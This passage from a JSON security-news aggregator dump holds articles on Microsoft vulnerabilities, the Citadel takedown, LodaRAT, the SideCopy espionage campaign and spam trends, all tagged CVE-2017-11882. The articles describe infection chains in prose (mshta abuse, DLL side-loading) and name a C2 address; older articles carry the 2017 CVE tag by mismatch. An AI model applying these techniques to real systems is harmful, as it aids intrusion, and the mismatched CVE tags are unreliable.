memory that can be used to build an ROP chain. Microsoft\u2019s addition of Data Execution Prevention and ASLR in Windows Vista and Windows 7 prevents attackers from executing code in a particular memory location because those memory modules are now randomized.\n\n\u201cBack in Windows XP when there was no ASLR and no randomization of the modules, it was relatively easy. You would just pick a module and then reuse the code inside that module to still get code execution,\u201d Vreugdenhil said. \u201cWindows 7 came out and put the bar higher by shuffling the modules around, so theoretically, you didn\u2019t know where your modules were in the process. It theoretically should be impossible to point at an address and say \u2018Hey would you execute code at that address because I know there\u2019s something going to be there.\u2019\u201d\n\nIf an attacker can force a process to leak memory from inside back to an exploit, the attacker will be able to reuse that information and bypass ASLR and DEP because he will know where the memory module is located, Vreugdenhil said. From there, an attacker needs to figure out additional memory protections in place, and address those to control the underlying system.\n\n\u201cIn the case of EMET, there\u2019s a long list of protection mechanisms it adds, there\u2019s only two or three that could be a hindrance if you\u2019re writing a client-side IE exploit. And so it\u2019s usually just a matter of figuring out what they are and coming up with ways to sidestep them,\u201d Vreugdenhil said. \u201cIf we can do it, we assume there\u2019s many more people who can do it, and it\u2019s also going to be used by the bad guys anywhere between now and a year or two years.\u201d\n", "modified": "2014-03-05T20:45:44", "published": "2014-03-05T10:07:31", "id": "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "href": "https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/", "type": "threatpost", "title": "Researchers Investing in EMET Bypasses More than Hackers", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:51", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[From SearchSecurity (Robert Westervelt)](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1361617,00.html>)\n\n[](<https://threatpost.com/new-flaw-microsoft-office-web-components-under-attack-071309/>)Microsoft issued an advisory Monday, warning of a new vulnerability in [Office Web Components](<http://www.microsoft.com/technet/security/advisory/973472.mspx>) being actively targeted by attackers. The Office Web Components allow users to view spreadsheets, charts and databases on the Web. Microsoft said the vulnerability is in the Spreadsheet ActiveX Control, which is used by Internet Explorer (IE) to display the data in the browser. It is remotely exploitable when a person browses with IE and visits a malicious website. If successfully exploited, an attacker could gain the same user rights as the local user and gain complete control of a system, Microsoft said. [Read the full story](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1361617,00.html>) [SearchSecurity].\n", "modified": "2013-04-17T16:38:54", "published": "2009-07-13T18:53:30", "id": "THREATPOST:1D743B7D5397A9D33A091396D1D95BDB", "href": "https://threatpost.com/new-flaw-microsoft-office-web-components-under-attack-071309/72911/", "type": "threatpost", "title": "New Flaw in Microsoft Office Web Components Under Attack", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:10", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft\u2019s monthly release of security bulletins today is a relatively light load of patches to be tested and deployed. The real news, however, could be in a separate advisory in which it continues to deprecate the outdated RC4 encryption algorithm.\n\nFollowing its initial advisory in May that applied to the .NET framework, today\u2019s move [extends RC4 deprecation](<https://support.microsoft.com/en-us/kb/2978675>) to Windows 10 systems that are running .NET Framework 3.5 applications and systems with .NET Framework 4.6 installed that are running .NET Framework 4.5/4.5.1/4.5.2 applications.\n\nThe advisory also updates the default transport encryption in Windows to TLS 1.2.\n\nThe move is timely as the industry continues to move away from weakened encryption. For example, a recent academic paper projects that the time to arrive at a [practical SHA-1 collision attack](<https://threatpost.com/practical-sha-1-collision-months-not-years-away/114979/>) can now be measured in months, not years. Continuous improvements to processing speeds and availability and tweaks to existing attacks put weak encryption within reach of well funded criminal or state-sponsored operations.\n\nAs for today\u2019s half-dozen security bulletins, Microsoft has rated three of them as critical, including the ubiquitous Internet Explorer rollup and patches for remote code execution vulnerabilities in the VBScript and Jscript engines in Windows.\n\nFour vulnerabilities are addressed in [MS15-108](<https://technet.microsoft.com/en-us/library/security/MS15-108>), none of which have been publicly disclosed; Microsoft said it also not aware of public exploits.\n\nMicrosoft said attackers could host an exploit online or phish users with a malicious ActiveX control embedded in an Office document that uses the Internet Explorer rendering engine to redirect users to the malicious website.\n\nThe vulnerabilities affect Vista, Windows Server 2008 and Server Core installations of Windows Server 2008 R2. Today\u2019s update patches two separate scripting enginer memory corruption vulnerabilities, an information disclosure flaw and an ASLR bypass.\n\n\u201cThe update addresses the vulnerabilities by modifying how the VBScript and JScript scripting engines handle objects in memory, and helping to ensure that affected versions of VBScript properly implement the ASLR security feature,\u201d Microsoft said in its advisory.\n\n\u201cWith the number of JScript and VBscript related vulnerabilities addressed this month, Microsoft needs to adopt a disabled by default strategy with those technologies until they can be removed entirely,\u201d said Core Security systems engineer Bobby Kuzma. \u201cUnfortunately that will never happen, due to the huge legacy application technical debt held by large organizations and governments worldwide.\u201d\n\nMicrosoft also patched 14 vulnerabilities in Internet Explorer and two more in Microsoft Edge browser for Windows 10 systems.\n\nMost of the IE update addresses memory corruption vulnerabilities in [MS15-106](<https://technet.microsoft.com/library/security/MS15-106>) along with a handful of privilege elevation and information disclosure flaws. There is also some overlap with the VBScript and Jscript bulletin, since IE is the principal attack vector there. One of the IE bugs, reported by researchers at FireEye, has been publicly disclosed, but none of the flaws have been exploited in the wild, Microsoft said.\n\nThe Microsoft Edge bulletin, [MS15-107](<https://technet.microsoft.com/library/security/MS15-107>), is rated moderate and takes care of a vulnerability that enables bypass of the browser\u2019s cross-site scripting filter, and a separate information disclosure vulnerability.\n\nThe remaining critical bulletin patches a remote code execution vulnerability in Windows Shell.\n\n\u201cThe vulnerabilities could allow remote code execution if a user opens a specially crafted toolbar object in Windows or an attacker convinces a user to view specially crafted content online,\u201d Microsoft said in advisory [MS15-109](<https://technet.microsoft.com/library/security/MS15-109>).\n\nThe remaining bulletins are rated important by Microsoft.\n\n[MS15-110](<https://technet.microsoft.com/library/security/MS15-110>) patches three remote code execution vulnerabilities in Microsoft Office, all of which are memory corruption flaws, while [MS15-111](<https://technet.microsoft.com/library/security/MS15-111>) is a Windows kernel update that patches five vulnerabilities, including three different privilege elevation flaws, a memory corruption issue, and a Trusted Boot bypass.\n", "modified": "2015-10-14T20:03:27", "published": "2015-10-13T14:39:57", "id": "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "href": "https://threatpost.com/microsoft-releases-six-bulletins-continues-rc4-deprecation/115017/", "type": "threatpost", "title": "October 2015 Microsoft Patch Tuesday Security Bulletins", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:12", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "A [suspicious Windows 7 update](<https://answers.microsoft.com/en-us/windows/forum/windows_7-update/windows-7-update-appears-to-be-compromised/e96a0834-a9e9-4f03-a187-bef8ee62725e?auth=1>) today raised concern on a number of Microsoft and technology forums that the Windows Update service had been compromised. Microsoft, however, cleared the air several hours later admitting that the update was their mistake.\n\n\u201cWe incorrectly published a test update and are in the process of removing it,\u201d said a Microsoft spokesperson\n\nA compromise of such an automated update service would have had devastating results. Automated software update services have long been speculated as a means to spread malware at scale. Attackers or governments that infiltrate something like Windows Update could compromise software updates to the point where such services are no longer trusted, leaving endpoints and servers unpatched and at greater risk.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2015/09/07002408/accidental-windows-update.jpeg>)\n\nRated important, the mysterious update, purportedly a new language pack, showed up early this morning on home and business users\u2019 machines. The update was 4.3 MB in size and included long, random character file names and redirects to different .mil, .gov and .edu domains\u2014both of which were out of the norm for Windows updates.\n\nThe update has since disappeared from Windows Update, but not before it was pushed mostly to consumers via Windows Update. Some users said the update to install on their machines. Others who successfully installed the update essentially bricked their machines, according to replies on the original Windows 7 forum post.\n\nWindows Update and Windows Server Update Services (WSUS) are especially juicy targets. At Black Hat this summer, researchers Paul Stone and Alex Chapman of Context Information Security of the U.K. demonstrated [weaknesses in WSUS](<https://threatpost.com/manipulating-wsus-to-own-enterprises/114168/>) that are difficult to address and expose any server or desktop using its automated updates to compromise.\n\nJust last week, the _[Washington Post](<https://www.washingtonpost.com/world/national-security/obama-administration-ponders-how-to-seek-access-to-encrypted-data/2015/09/23/107a811c-5b22-11e5-b38e-06883aacba64_story.html>) _reported that the U.S. government explored several approaches that technology providers could implement to cure the [Going Dark crypto issue](<https://threatpost.com/feasible-going-dark-crypto-solution-nowhere-to-be-found/114150/>). Law enforcement and government officials have expressed concern over recent changes from Apple and Google, in particular, to divorce themselves from storing encryption keys. The practice, government says, hinders law enforcement and national security investigations. They suggest, according to the _Post _article, that under a court order, the government could drop spyware on machines via software update services.\n\nAt TrustyCon, a 2014 event adjunct to RSA Conference, ACLU principal technologist Chris Soghoian delivered a talk that also suggested the next wave of [surveillance efforts could target update services](<https://threatpost.com/are-automated-update-services-the-next-surveillance-frontier/104558/>).\n\nSoghoian said his concern is that the government will not only exploit the convenience of these update services offered by most large providers, but also that it will erode the trust users have in the services leaving them vulnerable to cybercrime, identity theft and fraud.\n\n\u201cThere are really sound security reasons why we want automatic security updates. If consumers have to do work to get updates, they won\u2019t, and they will stay vulnerable,\u201d Soghoian said in 2014. \u201cWhat that means though is giving companies root on our computers\u2014and we really don\u2019t know what\u2019s in the code after fact. This is a point of leverage the government can use. We have no evidence they are using it right now, but these companies have a position of power over our devices that is unparalleled.\u201d\n", "modified": "2015-10-02T16:00:39", "published": "2015-09-30T15:22:01", "id": "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "href": "https://threatpost.com/suspicious-windows-7-update-actually-an-accidental-microsoft-test-update/114860/", "type": "threatpost", "title": "Mystery Windows 7 Update An Accidental Test Update", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:36", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Many industries tend to run in identifiable cycles. Financial services, the auto industry, entertainment\u2013they all have cycles. Because the security industry isn\u2019t nearly as old as any of these, it hasn\u2019t had much of a chance to establish such cycles. But one seems to be appearing now in the form of renewed criticism and distaste for offensive security research.\n\nThe most recent cycle has been building momentum for some time now, but the jumping off point may have come last month in a talk by Adobe security and privacy chief Brad Arkin. The gist of the talk was that defenders need to focus their energy on making exploitation and attacks more expensive for the bad guys. However that happens\u2013whether it\u2019s through the addition of exploit mitigation technologies, deploying sandboxes or any number of other techniques\u2013raising the cost of attacks should be the priority.\n\n\u201cI would say to the researchers here, work on defense. This is where you\u2019re going to make a difference,\u201d Arkin said. \u201cIf you come up with a new offensive technology, the bad guys will use it.\u201d\n\nThat\u2019s in contrast to the mentality that has prevailed among many software companies and security professionals, who often focus on finding and fixing as many security vulnerabilities as possible. The more bugs you fix, the fewer there are for the attackers to exploit, after all.\n\nThat\u2019s true, of course, but it ignores the fact that the number of total bugs is unknowable and constantly changing. And, it also ignores the fact that many attackers don\u2019t ever bother with zero days; there\u2019s no need. There are so many older vulnerabilities that are lying unpatched on millions and millions of machines out there that it\u2019s a waste of time and money for attackers to look for new ones to exploit. \n\u201cFinancially motivated attackers don\u2019t invest in original research. It\u2019s too expensive these days,\u201d Arkin said. \u201cIt\u2019s pen testers or it\u2019s nation states or the people funded by them. That research is done by professional bad guys who have financial horizons that far exceed those of financially motivated bad guys.\u201d\n\nAt last week\u2019s RSA Conference there were more murmurs about the relative value of offensive security research, too. The ongoing debate about the sale of bugs\u2013whether it\u2019s on the black market, the grey area of government sales or to legitimate entities such as the Zero Day Initiative\u2013includes some in the security community who are of the mind that selling vulnerabilities is an inherently shady activity. That discussion came up many times over the course of the week, with a predictable lack of agreement on the subject.\n\nThe problem, opponents of bug sales say, is that regardless of who you sell the bug to, you have no way of knowing against whom that vulnerability might ultimately be used. Some researchers say that\u2019s not their problem; they do the research and make the sale and what happens after that is up to the buyer and out of their hands.\n\nWith the [Pwn2Own contest at CanSecWest](<https://threatpost.com/revamped-pwn2own-offer-105k-prizes-cash-google-chrome-0-days-012312/>) scheduled for later this week, the conversation will likely not just continue, but amp up. Offense is at the fore at CanSecWest, not just during Pwn2Own, but during the conference talks, as well, and rare is the year that a major bug or exploitation technique isn\u2019t revealed there.\n\nThis is not the first time this carousel has spun round this way. Ten or fifteen years ago, as legitimate security research was making its way into the mainstream, many vendors had reactions bordering on anaphylactic shock when a researcher reported a bug to them or went public with it after a lack of response. Large software companies, including Microsoft and Oracle, would in some cases refuse to deal with researchers at all or slow the process down to such a point that it was impossible for the researchers to know whether the bug would ever be fixed.\n\nThat led to the brain-melting disclosure debate, which has never gone away, and it also led to the establishment of formal security response programs and organizations at many companies. Later, it helped spur the bug bounty programs run by companies such as Google, Mozilla and others, to reward security researchers who chose to report their findings to the vendors privately.\n\nSo, as often happens, what was old is now new again. But this time it has the added spice of cyberwar hysteria, with legions of highly trained foreign attackers using zero days stolen from some secret NSA database. Maybe that\u2019s happening. Who knows? But what\u2019s definitely happening is that researchers are selling bugs to a variety of people and organizations, some legitimate and others not. And as long as serious bugs can command six figures, that\u2019s never going to end and neither will offensive security research.\n", "modified": "2013-04-17T16:32:42", "published": "2012-03-06T10:20:31", "id": "THREATPOST:0F2DE86E0069A54E56B0694DA999399A", "href": "https://threatpost.com/end-offensive-security-research-unlikely-030612/76285/", "type": "threatpost", "title": "An End to Offensive Security Research? Unlikely", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[From Computerworld (Gregg Keizer)](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>)[](<https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/>)\n\nAfter discovering attack code on a brand new Windows XP netbook, anti-virus vendor Kaspersky Labs warned users yesterday that they should scan virgin systems for malware before connecting them to the Internet.\n\nWhen Kaspersky developers installed their recently-released Security for Ultra Portables on an M&amp;A Companion Touch netbook purchased for testing, \u201cthey thought something strange was going on,\u201d [said Roel Schouwenberg](<http://www.viruslist.com/en/weblog?weblogid=208187720>) [viruslist.com], a senior anti-virus researcher with the Moscow-based firm. Schouwenberg scanned the machine \u2014 a $499 netbook designed for the school market \u2014 and found three pieces of malware. [Read the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>) [computerworld.com]\n", "modified": "2013-04-17T16:39:14", "published": "2009-05-19T15:38:56", "id": "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "href": "https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/72668/", "type": "threatpost", "title": "New Windows netbooks may harbor malware", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:41", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "**UPDATE** \u2013 Calling it the company\u2019s \u201cmost aggressive\u201d botnet operation operation to date, Microsoft has joined with the FBI for a massive disruption of the Citadel botnet.\n\nMore than 1,400 individual botnets associated with the Citadel malware affecting more than five million people in total were disrupted, with cooperation from the Federal Bureau of Investigation and interestingly, a civil seizure warrant issued by the U.S. District Court for the Western District of North Carolina.\n\nGroups like the Financial Services \u2013 Information Sharing and Analysis Center (FS-ISAC), NACHA \u2013 The Electronic Payments Association, the American Bankers Association (ABA) and Agari, an email phishing authentication firm, all helped chip in intelligence as well.\n\nWhile this was the seventh botnet operation of its kind coordinated by Microsoft, this is the first time the company has worked with the law enforcement sector to secure a civil seizure warrant to carry out its plans.\n\nRichard Boscovich, the Assistant General Counsel of Microsoft\u2019s Digital Crimes Unit wrote about the operation \u2013 codenamed Operation b54 \u2013 on [the company\u2019s Technet blog](<http://blogs.technet.com/b/microsoft_blog/archive/2013/06/05/microsoft-works-with-financial-services-industry-leaders-law-enforcement-and-others-to-disrupt-massive-financial-cybercrime-ring.aspx>) last night claiming the action won\u2019t fully eradicate the Citadel malware but should \u201csignificantly\u201d curb the botnet going forward.\n\n\u201cDue to Citadel\u2019s size and complexity, we do not expect to fully take out all of the botnets in the world using the Citadel malware,\u201d he wrote, \u201chowever, we do expect that this action will significantly disrupt Citadel\u2019s operation.\u201d\n\nTechnical details on the operation are somewhat scant but Microsoft says the operation culminated yesterday after officials from Microsoft, assisted by U.S. Marshalls helped remove servers from two data hosting facilities in New Jersey and Pennsylvania. The takedown was set into motion last week after the North Carolina court order successfully cut off communication between the Citadel botnets, 1,462 in total, and their infected machines.\n\nAgari, a Palo Alto-based email phishing authentication firm had a big hand in helping Microsoft obtain the seizure warrant.\n\nWhile the full operation took about a year, Agari spent six of those months poring over phishing emails that were pulling unsuspecting users into the Citadel botnet.\n\nAgari CEO Patrick Peterson described how the company helped monitoring emails that led to the seizure of the servers in Pennsylvania and New Jersey.\n\n\u201cOur whole system is designed to isolate these malicious emails and to get that forensic data for law enforcement, for our customers, for the industry to be able to track the bad guys,\u201d Patterson explained, \u201cIn this case working with our partners, the FBI, Microsoft, FS-ISAC, we were able to customize the focus of that specifically around that Citadel botnet.\u201d\n\nThe company monitored approximately 2.5 million malicious URLs every month and while not every one of those URLs led to the Citadel malware, all of them were pretending to come from a legitimate bank.\n\nAgari is part of FS-ISAC\u2019s Trusted Registry Program, a program dedicated to securing the emails the financial services industry sends out. FS-ISAC reached out to Microsoft about Agari\u2019s wealth of phishing emails and the company joined the investigation from there.\n\n\u201cI think it\u2019s a great day for everyone involved,\u201d Peterson said, \u201cIt\u2019s certainly a day when everyone on the internet is safer than they were yesterday and that doesn\u2019t happen very often.\u201d\n\nThe Citadel Trojan has been spotted mining all types of financial information, including banking logins and passwords since [being introduced a year and a half ago](<http://threatpost.com/citadel-malware-authors-adopt-open-source-development-model-020812/>). To date it\u2019s believed the botnet is responsible for more than half a billion dollars in financial loss.\n\nPeddled primarily on a handful of underground forums as a variant of the Zeus Trojan, the malware has long been cloaked in secrecy. Owners insist on distributing their kit among trusted insiders, [h0ping to keep law enforcement out and support costs down](<http://threatpost.com/citadel-trojan-updates-dynamic-config-mechanism-streamlines-fraud-activity-101812/>).\n\nMicrosoft has taken a hard line on cybercrime over the last several years and much of that is due to [the work being done by its Digital Crimes Unit](<http://threatpost.com/at-microsoft-a-sharpened-focus-on-cybercrime/>). The DCU, a collection of Microsoft engineers, security experts and lawyers, have proved successful at shutting down botnets that are largely dependent on a centralized infrastructure including Kelihos, Zeus, Waledac and Rustock.\n\nIn [a discussion with Threatpost\u2019s Dennis Fisher last month](<http://threatpost.com/qa-microsofts-tj-campana/>), T.J. Campana, the DCU\u2019s Director of Security claimed the group tries to take a transparent approach with their takedowns.\n\n\u201cWe\u2019re not just going out there shooting stuff. We walk in with a pile of legal documents. We\u2019re asking for a judge to agree with what we found,\u201d Campana said of the group\u2019s actions at the time.\n", "modified": "2013-06-10T19:43:44", "published": "2013-06-06T13:38:55", "id": "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "href": "https://threatpost.com/microsoft-authorities-disrupt-hundreds-of-citadel-botnets-with-operation-b54/100902/", "type": "threatpost", "title": "Operation b54 Knocks 1,000+ Citadel Botnets Offline", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2021-02-15T13:26:26", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[](<https://thehackernews.com/images/-tqjnoGRTR9g/YCPLcDyCPJI/AAAAAAAABus/hbBSlGtymgQZUdyWVYb21EOjH9vHgiyCwCLcBGAsYHQ/s0/android-hacking.jpg>)\n\nA previously known Windows remote access Trojan (RAT) with credential-stealing capabilities has now expanded its scope to set its sights on users of Android devices to further the attacker's espionage motives.\n\n\"The developers of [LodaRAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.loda>) have added Android as a targeted platform,\" Cisco Talos researchers [said](<https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html>) in a Tuesday analysis. \"A new iteration of LodaRAT for Windows has been identified with improved sound recording capabilities.\"\n\nKasablanca, the group behind the malware, is said to have deployed the new RAT in an ongoing hybrid campaign targeting Bangladeshi users, the researchers noted.\n\nThe reason why Bangladesh-based organizations have been specifically singled out for this campaign remains unclear, as is the identity of the threat actor.\n\n[](<https://go.thn.li/password-auditor> \"password auditor\" )\n\nFirst documented in May 2017 by [Proofpoint](<https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware>), Loda is an AutoIt malware typically delivered via phishing lures that's equipped to run a wide range of commands designed to record audio, video, and capture other sensitive information, with [recent](<https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html>) [variants](<https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html>) aimed at stealing passwords and cookies from browsers.\n\n[](<https://thehackernews.com/images/--8RMWrAwLfY/YCPKSh6P1SI/AAAAAAAABuY/7lRzGVnRVa0dHBhokPWNpXI-TtuC9YH8QCLcBGAsYHQ/s0/android-malware-permissions.jpg>)\n\nThe latest versions \u2014 dubbed Loda4Android and Loda4Windows \u2014 are a lot alike in that they come with a full set of data-gathering features that constitute a stalker application. However, the Android malware is also different, as it particularly avoids techniques often used by banking Trojans, like [abusing Accessibility APIs](<https://thehackernews.com/2021/01/italy-cert-warns-of-new-credential.html>) to record on-screen activities.\n\nBesides sharing the same command-and-control (C2) infrastructure for both Android and Windows, the attacks, which originated in October 2020, have targeted banks and carrier-grade voice-over-IP software vendors, with clues pointing to the malware author being based in Morocco.\n\nThe attackers also made of a myriad number of social engineering tricks, ranging from typo squatted domains to malicious RTF documents embedded in emails, that, when opened, triggered an infection chain that leverages a memory corruption vulnerability in Microsoft Office (CVE-2017-11882) to download the final payload.\n\n[](<https://thehackernews.com/images/-ICoOr9MEQO8/YCPKhqqDnPI/AAAAAAAABuc/omP3BWsDN5YFLSUMMZQgBowmX2eyD6GUwCLcBGAsYHQ/s0/android-malware.jpg>)\n\nWhile the Android version of the malware can take photos and screenshots, read SMS and call logs, send SMS and perform calls to specific numbers, and intercept SMS messages or phone calls, its latest Windows counterpart comes with new commands that enable remote access to the target machine via Remote Desktop Protocol (RDP) and a \"Sound\" command that makes use of [BASS](<https://www.un4seen.com/bass.html>) audio library to capture audio from a connected microphone.\n\n\"The fact that the threat group has evolved into hybrid campaigns targeting Windows and Android shows a group that is thriving and evolving,\" said researchers with Cisco Talos.\n\n\"Along with these improvements, the threat actor has now focused on specific targets, indicating more mature operational capabilities. As is the case with earlier versions of Loda, both versions of this new iteration pose a serious threat, as they can lead to a significant data breach or heavy financial loss.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-02-15T11:57:41", "published": "2021-02-10T12:18:00", "id": "THN:DADA9CB340C28F942D085928B22B103F", "href": "https://thehackernews.com/2021/02/lodarat-windows-malware-now-also.html", "type": "thn", "title": "LodaRAT Windows Malware Now Also Targets Android Devices", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-30T16:10:59", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[](<https://thehackernews.com/images/-moq29tjLKes/X3Hiw_j-BWI/AAAAAAAAAzw/G5NSZ76jyIEmHTHx-X2e_kV6iO-wPmGkwCLcBGAsYHQ/s728/indian-army-virus.jpg>)\n\nCybersecurity researchers uncovered fresh evidence of an ongoing cyberespionage campaign against Indian defense units and armed forces personnel at least since 2019 with an aim to steal sensitive information.\n\nDubbed \"**Operation SideCopy**\" by Indian cybersecurity firm [Quick Heal](<https://www.seqrite.com/blog/operation-sidecopy/>), the attacks have been attributed to an advanced persistent threat (APT) group that has successfully managed to stay under the radar by \"copying\" the tactics of other threat actors such as the [SideWinder](<https://thehackernews.com/2020/01/android-zero-day-malware-apps.html>).\n\n### Exploiting Microsoft Equation Editor Flaw\n\nThe campaign's starting point is an email with an embedded malicious attachment \u2014 either in the form of a ZIP file containing an LNK file or a Microsoft Word document \u2014 that triggers an infection chain via a series of steps to download the final-stage payload.\n\n[](<https://go.thn.li/contrast> \"cybersecurity\" )\n\nAside from identifying three different infection chains, what's notable is the fact that one of them exploited template injection and Microsoft Equation Editor flaw ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), a 20-year old memory corruption issue in Microsoft Office, which, when exploited successfully, let attackers execute remote code on a vulnerable machine even without user interaction.\n\nMicrosoft addressed the issue in a patch released in [November 2017](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>).\n\n[](<https://thehackernews.com/images/-yeksQpFeoGU/X3Hjgm_8XwI/AAAAAAAAAz8/8voJD0WmwyEW3F9S0LX6UK_qAEruSqQCgCLcBGAsYHQ/s0/indian-army.jpg>)\n\nAs is often the case with such malspam campaigns, the attack relies on a bit of social engineering to bait the user into opening a seemingly realistic Word document that claims to be about the Indian government's defense production policy.\n\nWhat's more, the LNK files have a double extension (\"Defence-Production-Policy-2020.docx.lnk\") and come with document icons, thereby tricking an unsuspecting victim into opening the file.\n\nOnce opened, the LNK files abuse \"[mshta.exe](<https://attack.mitre.org/techniques/T1218/005/>)\" to execute malicious HTA (short for Microsoft HTML Applications) files that are hosted on fraudulent websites, with the HTA files created using an open-sourced payload generation tool called [CACTUSTORCH](<https://github.com/mdsecactivebreach/CACTUSTORCH>).\n\n### A Multi-stage Malware Delivery Process\n\nThe first stage HTA file includes a decoy document and a malicious .NET module that executes the said document and downloads a second-stage HTA file, which in turn checks for the presence of popular antivirus solutions before copying Microsoft's credential back and restore utility (\"credwiz.exe\") to a different folder on the victim machine and modifying the registry to run the copied executable every time upon startup.\n\nConsequently, when this file gets executed, not only does it side-load a malicious \"DUser.dll\" file, it also launches the RAT module \"winms.exe,\" both of which are obtained from the stage-2 HTA.\n\n\"This DUser.dll will initiate the connection over this IP address '173.212.224.110' over TCP port 6102,\" the researchers said.\n\n\"Once successfully connected, it will [...] then proceed for performing various operations based on the command received from C2. For example, if C2 sends 0, then it collects the Computer Name, Username, OS version etc. and sends it back to C2.\"\n\n[](<https://thehackernews.com/images/-q-0sbc9Cl08/X3HkAhQRMSI/AAAAAAAAA0I/vjEr5t0jwRY3WhXg5V1Pk0S9zCsvH7W6QCLcBGAsYHQ/s0/cyber-attack-vector.jpg>)\n\nStating the RAT shared code-level similarities with Allakore Remote, an open-sourced remote-access software written in Delphi, Quick Heal's Seqrite team noted that the Trojan employed Allakore's RFB (remote frame buffer) protocol to exfiltrate data from the infected system.\n\n### Possible Links to Transparent Tribe APT\n\nIn addition, a few attack chains are also said to have dropped a previously unseen .NET-based RAT (called \"Crimson RAT\" by [Kaspersky](<https://securelist.com/transparent-tribe-part-1/98127/>) researchers) that comes equipped with a wide range of capabilities, including access files, clipboard data, kill processes, and even execute arbitrary commands.\n\nAlthough the modus operandi of naming DLL files shares similarities with the SideWinder group, the APT's heavy reliance on the open-sourced toolset and an entirely different C2 infrastructure led the researchers to conclude with [reasonable confidence](<https://securelist.com/transparent-tribe-part-2/98233/>) that the threat actor is of Pakistani origin \u2014 specifically the [Transparent Tribe](<https://malpedia.caad.fkie.fraunhofer.de/actor/operation_c-major>) group, which has been recently linked to several attacks targeting the Indian military and government personnel.\n\n\"Thus, we suspect that the actor behind this operation is a sub-division under (or part of) Transparent-Tribe APT group and are just copying TTPs of other threat actors to mislead the security community,\" Quick Heal said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2020-09-30T15:00:45", "published": "2020-09-28T13:27:00", "id": "THN:81AA37DC2B87520CB02F3508EF82AABD", "href": "https://thehackernews.com/2020/09/cyberattack-indian-army.html", "type": "thn", "title": "Researchers Uncover Cyber Espionage Operation Aimed At Indian Army", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-05-06T15:40:20", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882"], "description": "\n\n## Figures of the year\n\n * The share of spam in mail traffic was 56.51%, which is 4.03 p.p. more than in 2018.\n * The biggest source of spam this year was China (21.26%).\n * 44% of spam e-mails were less than 2 KB in size.\n * Malicious spam was detected most commonly with the Exploit.MSOffice.CVE-2017-11882 verdict.\n * The Anti-Phishing system was triggered 467,188,119 times.\n * 17 % of unique users encountered phishing.\n\n## Trends of the year\n\n### Beware of novelties\n\nIn 2019, attackers were more active than usual in their exploitation of major sports and movie events to gain access to users' financial or personal data. Premieres of TV shows and films, and sports broadcasts were used as bait for those looking to save money by watching on \"unofficial\" resources.\n\nA search for \"Watch latest X for free\" (where X = _Avengers_ movie, _Game of Thrones_ season, Stanley Cup game, US Open, etc.) returned links to sites offering the opportunity to do precisely that. On clicking through to these resources, the broadcast really did begin, only to stop after a couple of minutes. To continue viewing, the user was prompted to create a free account (only an e-mail address and password were required). However, when the Continue button was clicked, the site asked for additional confirmation.\n\nAnd not just any old information, but bank card details, including the three-digit security code (CVV) on the reverse side. The site administrators assured that funds would not be debited from the card, but that this data was needed only 